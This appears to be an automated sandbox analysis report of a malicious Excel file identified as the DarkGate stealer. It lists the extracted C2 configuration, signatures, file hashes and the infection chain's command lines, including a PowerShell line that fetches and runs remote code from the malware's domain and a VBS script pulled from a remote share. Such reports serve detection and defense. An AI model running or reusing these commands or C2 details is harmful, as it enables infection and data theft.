Analysis
-
max time kernel
135s -
max time network
136s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-03-2024 19:47
Static task
static1
Behavioral task
behavioral1
Sample
ACH-5634-15March.xlsx
Resource
win10-20240221-en
Behavioral task
behavioral2
Sample
ACH-5634-15March.xlsx
Resource
win10v2004-20231215-en
General
-
Target
ACH-5634-15March.xlsx
-
Size
48KB
-
MD5
ee31ad80a97f3f17db35d8add92e3396
-
SHA1
16bcf433568390b8ca3d2190eac5a66d4828aab9
-
SHA256
79ebb9f1d447cc3aa7a757366b3deec702d0659209059800b9f553adb45e6161
-
SHA512
2df8814928f5f0983f54694db1bb2337e15990fb2d90438b99763844e763009a7ff65c0fbe9491aea5e3dda458aaf60ef909bc3b74d2798aee02dabdbc7268cb
-
SSDEEP
768:ZFlppbq6i4Y/TJC4xJMxXcvFLwAPq4Sxv9PvEgzegYN1T/r:tLq94YV7JMxXyd4x+gzexTj
Malware Config
Extracted
darkgate
admin888
diveupdown.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
VfiPBBhr
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral3/memory/2624-66-0x00000000031C0000-0x0000000003233000-memory.dmp family_darkgate_v6 behavioral3/memory/2624-68-0x00000000031C0000-0x0000000003233000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4804 1444 WScript.exe 79 -
Blocklisted process makes network request 4 IoCs
flow pid Process 16 1416 powershell.exe 18 1416 powershell.exe 19 1416 powershell.exe 20 1416 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2624 AutoHotkey.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1444 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1416 powershell.exe 1416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1416 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE 1444 EXCEL.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1444 wrote to memory of 4804 1444 EXCEL.EXE 83 PID 1444 wrote to memory of 4804 1444 EXCEL.EXE 83 PID 4804 wrote to memory of 1416 4804 WScript.exe 84 PID 4804 wrote to memory of 1416 4804 WScript.exe 84 PID 1416 wrote to memory of 2364 1416 powershell.exe 86 PID 1416 wrote to memory of 2364 1416 powershell.exe 86 PID 1416 wrote to memory of 2624 1416 powershell.exe 87 PID 1416 wrote to memory of 2624 1416 powershell.exe 87 PID 1416 wrote to memory of 2624 1416 powershell.exe 87 PID 1416 wrote to memory of 1924 1416 powershell.exe 88 PID 1416 wrote to memory of 1924 1416 powershell.exe 88 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1924 attrib.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH-5634-15March.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.182.156.154\share\EXCEL_DOCUMENT_OPEN.XLSX.vbs"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'diveupdown.com/uyvbjbho')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\system32\certutil.exe"C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe4⤵PID:2364
-
-
C:\fpcg\AutoHotkey.exe"C:\fpcg\AutoHotkey.exe" script.ahk4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2624
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/fpcg4⤵
- Views/modifies file attributes
PID:1924
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
Filesize
1.7MB
MD5bf88d228baec74c7928df463db0f0fdc
SHA1efe1657bb9a9a31742b71d8c14bae89b2ab5533b
SHA256493099b55ea0da872d3b9855c5a60752833e737be547ebc5328caea2bf0542ed
SHA512c247a0dbba9971a8949729f888a4d8b10ca188b6fabedb9d1fe9cc7907cc4d807e66f3367ca287bf1e4062c342cbb7a724a9cc168018f55bc187e04897c8bdfa
-
Filesize
52KB
MD53433308fb4cfbf4754f37f8429cca3f6
SHA1a98c60ac207b30e015fa970059cd3d6af5aad11f
SHA256bf1bdcce4d86d8fce80f359f1a871c1bc70e29b3fcdff1d2ac70570ecf5a1bdc
SHA5120cc02989002194d4e86dd2452b552360a4472d72e261921cf2b13ab50523d789732b5b677c664ae73c5751180665417b349c3c424c41fb0d27026bc7f8f9b3cf
-
Filesize
916KB
MD5a7c06b0255856bae512a0f174891d74f
SHA1801b8ea8a27641fcfee78af6eff906052149054c
SHA2563816103d61866097c2f216a4668b633ce126ad18da77b3b6c87ac24382f70929
SHA5125d586cb80b3116d002c81b4df7aa449cd6fae454d03812eee3dd72de4e0806035d01bc4fcf16130f35ebfe5707c2d11e9453f8eb66f778a7729dc94bbfbd4cd6